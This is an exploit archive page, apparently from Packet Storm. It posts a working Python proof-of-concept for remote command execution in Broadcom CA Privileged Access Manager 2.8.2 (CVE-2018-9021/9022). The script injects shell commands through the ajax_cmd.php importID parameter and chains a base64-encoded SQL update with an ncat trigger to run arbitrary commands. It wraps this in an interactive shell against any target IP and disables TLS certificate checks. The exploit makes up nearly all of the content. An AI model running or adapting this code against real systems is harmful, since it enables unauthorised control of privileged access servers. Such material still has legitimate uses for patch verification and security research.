what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution
Posted Dec 5, 2019
Authored by Peter Lapp

Broadcom CA Privileged Access Manager version 2.8.2 suffers from a remote command execution vulnerability.

tags | exploit, remote
advisories | CVE-2018-9021, CVE-2018-9022
SHA-256 | b57c9d05247aeec50f84b6f1d59466d0e7e19320e75ac48a4c045bb8ffba4b6b

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

Change Mirror Download
# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
# Tested on: v2.8.2

import urllib2
import urllib
import ssl
import sys
import json
import base64


ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def send_command(ip, cmd):
cmd = urllib.quote_plus(cmd)
url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
request = urllib2.Request(url, None)
response = urllib2.urlopen(request, context=ctx)
result = json.load(response)
return result['responseData']

def get_db_value():
cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
db_value = send_command(ip,cmd)
db_value = db_value.split('\n')[1]
return db_value

def encode_payload(cmd):
sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"
cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
return cmd

def restore_sql(value):
sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
send_command(ip,cmd)

def main():
print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''

if len(sys.argv) != 2:
print "Usage: xceedium_rce.py <target ip>"
sys.exit()

global ip
ip = sys.argv[1]
print 'Enter commands below. Type exit to quit'

while True:
cmd = raw_input('# ')
if cmd == "exit":
sys.exit()
orig_value = get_db_value()
payload = encode_payload(cmd)
send_command(ip, payload)
send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
output = send_command(ip, 'cat /tmp/output')
print output
restore_sql(orig_value)



if __name__ == "__main__":
main()
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close